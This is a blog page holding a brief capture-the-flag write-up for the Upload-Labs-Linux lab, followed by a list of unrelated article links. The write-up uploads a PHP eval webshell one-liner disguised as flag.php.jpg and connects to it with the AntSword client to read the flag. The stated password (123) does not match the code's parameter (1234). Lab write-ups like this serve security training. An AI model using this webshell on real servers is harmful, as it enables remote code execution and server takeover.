当前位置: 首页 > news >正文

Upload-Labs-Linux

news 来源:原创 2024/5/20 14:51:36

题目

1.打开靶机

随便上传一个图片,查看get请求发现/upload/XXX.jpg

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST[1234])?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找‘/’在最下面找到flag文件

5,打开文件得到flag

相关文章:

  • linux:下载、网络请求、端口
  • 查看docker映射数据卷
  • 3分钟了解安全数据交换系统有什么用!
  • 【效率工具】利用python进行本地知识库(PDF和WORK文件内容)的批量模糊搜索
  • 深入理解pytest.ini文件的配置与使用
  • Ref和类型断言
  • 移动应用开发框架概览:细节深入,全面解析
  • 油烟净化器如何做到高效净化?科技力量,清新餐饮生活
  • MySQL5.7的几种安装方式总结(排错踩坑呕心沥血的经历)
  • C# WPF上位机开发(从demo编写到项目开发)
  • 第二百二十八回
  • Text2SQL学习整理(五)将Text-to-SQL任务与基本语言模型结合
  • word2003 open word2007+
  • 【开源】基于JAVA语言的企业项目合同信息系统
  • 181.【2023年华为OD机试真题(C卷)】查找接口成功率最优时间段(深度优先搜索(DFS)实现JavaPythonC++JS)
  • (十五)java多线程之并发集合ArrayBlockingQueue
  • .pyc 想到的一些问题
  • flutter的key在widget list的作用以及必要性
  • Fundebug计费标准解释:事件数是如何定义的?
  • iOS 颜色设置看我就够了
  • React16时代,该用什么姿势写 React ?
  • spring boot 整合mybatis 无法输出sql的问题
  • SpriteKit 技巧之添加背景图片
  • underscore源码剖析之整体架构
  • 记录一下第一次使用npm
  • 开源SQL-on-Hadoop系统一览
  • 力扣(LeetCode)965
  • 前端技术周刊 2019-02-11 Serverless
  • 如何邀请好友注册您的网站(模拟百度网盘)
  • 使用 Node.js 的 nodemailer 模块发送邮件(支持 QQ、163 等、支持附件)
  • 异常机制详解
  • 运行时添加log4j2的appender
  • 策略 : 一文教你成为人工智能(AI)领域专家
  • 微龛半导体获数千万Pre-A轮融资,投资方为国中创投 ...
  • ​批处理文件中的errorlevel用法
  • (11)MATLAB PCA+SVM 人脸识别
  • (js)循环条件满足时终止循环
  • (LeetCode C++)盛最多水的容器
  • (Note)C++中的继承方式
  • (Redis使用系列) Springboot 使用redis实现接口幂等性拦截 十一
  • (Ruby)Ubuntu12.04安装Rails环境
  • (二)Eureka服务搭建,服务注册,服务发现
  • (强烈推荐)移动端音视频从零到上手(下)
  • (十三)Java springcloud B2B2C o2o多用户商城 springcloud架构 - SSO单点登录之OAuth2.0 根据token获取用户信息(4)...
  • (学习日记)2024.01.09
  • (幽默漫画)有个程序员老公,是怎样的体验?
  • .htaccess配置重写url引擎
  • .net core webapi 大文件上传到wwwroot文件夹
  • .net core 微服务_.NET Core 3.0中用 Code-First 方式创建 gRPC 服务与客户端
  • .net web项目 调用webService
  • .net 流——流的类型体系简单介绍
  • @staticmethod和@classmethod的作用与区别
  • [ 第一章] JavaScript 简史
  • [<MySQL优化总结>]
  • [2669]2-2 Time类的定义